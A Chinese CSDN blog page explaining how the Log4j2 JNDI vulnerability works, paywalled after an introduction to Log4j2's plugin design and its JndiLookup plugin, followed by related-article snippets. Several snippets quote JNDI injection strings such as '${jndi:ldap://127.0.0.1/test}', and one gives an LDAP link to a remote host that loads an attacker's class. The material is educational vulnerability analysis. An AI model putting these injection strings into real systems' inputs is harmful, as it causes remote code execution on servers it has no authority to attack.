Log4j2 Jndi 漏洞原理解析

已于 2022-02-19 18:01:36 修改
阅读量2.5k 收藏
点赞数 2
分类专栏: 漏洞分析&复现 文章标签: 安全
于 2022-01-01 04:58:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/122264709
版权

漏洞解析、复现

Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的<Appenders>,实际对应的则是如下的AppendersPlugin对象

 而我们在Xml Appenders下所定义的<Console>实际对应的则是如下的ConsoleAppender对象

看到这里应该就知晓了,我们在配置文件中所配置的各种元素实际上对应的均是Log4j2中的各种插件对象,Xml在被解析过程当中,会将你所配置的各种元素名称实例化为对应的插件对象,然后与你所配置的Logger进行关联。

Console,RollingFile 等则是我们一般情况下常用的插件,而此次出现重大漏洞问题的则是一个相对不太常用的插件,名叫:JndiLookup 呐,就是下面这个

 此时则会有一个疑问,这个插件?没见过?不熟悉?使用频率不高吧?<

最低0.47元/天 解锁文章
小韩韩啊
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
j2ewiz java转exe最高支持1.7jdk
09-07
目前只支持java1.7版本的jdk,1.8jdk的可能会出现版本错误,不支持
Java可执行文件制作
okJohn's blog
07-09 2817
1. 关于java可执行文件  通常情况下,我们开发java的程序都是以class文件或jar文件包的形式存在,而不做成单个的可执行文件。这些class或jar通过java命令或批处理方式来运行(前提是需要安装JRE)。有些机器上可以直接双击jar运行,那是由于在安装过JRE之后windows默认把*.jar使用javaw -jar打开。  不过,对大多数非技术用户来说,直接运行class或jar
Log4j2漏洞(一)原理和dnslog验证_log4j2漏洞原理
最新发布
2401_84972676的博客
05-13 926
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证, Apache Struts2、 Apache Solr、Apache Druid、 Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。
jar2工具将jar包转换成exe可执行文件的详细过程
VaPyl的博客
10-31 1万+
一、首先将程序导出为jar包 1、在MyEclipse中右击工程文件,选择export。 2、输入jar搜索,选择runnable jar file,点击next 3、选择程序的主类,保存文件的路径,点击finish。 二、将导出的jar包转换成可执行的exe文件 1、下载文件转换工具jar2exe,下载地址 http://download.csdn.net/download/k
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 1179
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1165
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDI是java系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
Log4j漏洞分析
a1290320893的博客
12-13 2599
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4j与Log4j2 2.15.0漏洞及解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4j和Log4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
漏洞影响了全球大量的网络服务,因此,快速、准确地检测和修复Log4j2漏洞变得至关重要。 针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。...
log4j2漏洞检测工具
05-07
2. **深度分析**: 工具会深入分析代码,找出所有使用Log4j2的地方,特别是那些可能接收用户输入或网络数据的地方,这些地方是漏洞可能被触发的关键点。 3. **风险评估**: 工具能够评估每个检测到的实例的风险等级,...
log4j2版本漏洞 修复版本2.16.0
12-17
漏洞的根本原因在于Log4j2中的JNDI(Java Naming and Directory Interface)功能。当用户输入的数据被解析并传递给JNDI时,恶意构造的输入可能导致RCE(远程代码执行)。例如,攻击者可以嵌入特定格式的字符串,如`$...
log4j2版本漏洞 修复版本2.15.0
12-17
Log4j2版本漏洞与修复方案》 在IT安全领域,漏洞的发现与修复是保障系统稳定运行的重要环节。此次我们关注的是“log4j2版本漏洞”,这是一个影响广泛且严重的问题,尤其是在Java应用程序中。Log4j2是Apache基金会...
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7561
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
6-java安全基础——JNDI和LDAP利用
网络安全
07-16 3371
在java JDK的6u141,7u131,8u121这几个版本中,jndi中的Naming/Directory服务中限制了Reference远程加载Object Factory类的特性,对com.sun.jndi.rmi.object.trustURLCodebase的值默认设置为false,即禁止从远程的URLCodebase加载Reference工厂类。 同样的代码,这里把jdk版本切换成JDK8u121版本 为什么会抛出ConfigurationException异常?以jdk8u.
log4j2远程代码执行漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
Java日志:log4j JNDI漏洞分析
Yal_insist的博客
04-16 1113
Java日志:log4j JNDI漏洞分析
JNDI注入漏洞
qq_61553520的博客
05-23 1232
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
虚拟ldap服务器,什么是LDAP,LDAP服务器是什么?
weixin_28989357的博客
08-13 739
从上述定义不难看出LDAP是一个目录,那么该目录是如何出现,有什么用呢?在当今的信息世界,网络为人们提供了丰富的资源。随着网络资源的日益丰富,迫切需要一种能有效管理资源信息并利于检索查询的服务技术。目录服务技术随之产生。1.LDAP目录服务可以有效地解决众多网络服务的用户账户问题。2.LDAP目录服务规定了统一的身份信息数据库、身份认证机制和接口,实现了资源和信息的统一管理,保证了数据的一致性和完...
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2247
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值